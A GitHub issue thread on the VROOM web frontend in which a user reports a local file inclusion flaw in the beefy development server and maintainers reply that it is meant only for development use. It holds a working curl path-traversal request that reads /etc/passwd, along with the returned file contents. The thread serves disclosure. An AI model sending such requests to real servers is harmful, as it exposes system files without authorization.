VROOM-Project / vroom-frontend

Web frontend for VROOM
http://map.vroom-project.org/
BSD 2-Clause "Simplified" License

Local File Inclusion #70

Closed fitzg2 closed 2 months ago

fitzg2 commented 2 months ago

Be careful about exposing this to the internet

$ curl --path-as-is -i -s -k "http://public-ip:9966/../../../../../../../../../../../../../../../../etc/passwd"
HTTP/1.1 200 OK
content-type: application/octet-stream
Date: Wed, 31 Jul 2024 23:38:03 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Transfer-Encoding: chunked

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin

Also it says it's running on 127.0.0.1 when in reality it listens on all hosts for some reason.

jcoupey commented 2 months ago

Well, the beefy way of serving things is convenient for dev purposes because it will update on changes. It is definitely not meant as a production setup. In fact we have a dedicated script to build and generate a standalone folder, under npm run dist.

fitzg2 commented 2 months ago

Right. Maybe this is more of an issue with beefy, given that it listens on all IPs regardless of any flags.

jcoupey commented 2 months ago

Probably makes sense to report this upstream? In which case I guess we could close here.